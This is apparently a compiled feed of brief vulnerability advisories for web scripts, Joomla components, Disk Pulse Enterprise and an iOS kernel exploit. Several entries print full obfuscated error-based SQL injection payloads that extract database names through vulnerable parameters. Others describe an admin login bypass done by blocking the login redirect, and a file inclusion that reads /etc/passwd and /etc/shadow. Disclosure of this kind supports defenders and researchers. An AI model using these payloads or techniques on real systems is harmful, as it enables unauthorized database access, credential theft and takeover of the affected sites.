Attackers can completely compromise a web application built on Matrimonial Script: they can gain access to the admin panel and manage the website as an admin without prior authentication. To exploit this vulnerability, an attacker can create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php and access http://example.com/path/admin/index.php.
The vulnerability allows an attacker to inject SQL commands into the vulnerable application. Proof of Concept: http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL] 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
Auto Car - Car listing Script 1.1 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'category' parameter in the 'search-cars' page. This can be exploited to dump the database contents, including the usernames, passwords, first and last names, and emails of the users.
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL] 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
Disk Pulse Enterprise is vulnerable to a remote SEH buffer overflow. An attacker can exploit this vulnerability by sending a specially crafted payload to the vulnerable server on port 8080. The payload contains malicious code that is executed on the target system.
ziVA is an iOS kernel exploit designed to work on all 64-bit iOS devices <= 10.3.1. It requires offsets for each iOS device and version, which can be acquired from AppleAVEDriver. Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and it is a step towards a full jailbreak. It is a crucial part of a jailbreak chain, but it was never intended to become a jailbreak.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL] 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter 'product_id' of the component Bargain Product VM3 1.0. Proof of concept is provided in the text.
The 'getpage' HTTP parameter is not escaped in the include file, which allows attackers to include local files with root privileges, such as /etc/passwd, /etc/shadow, etc.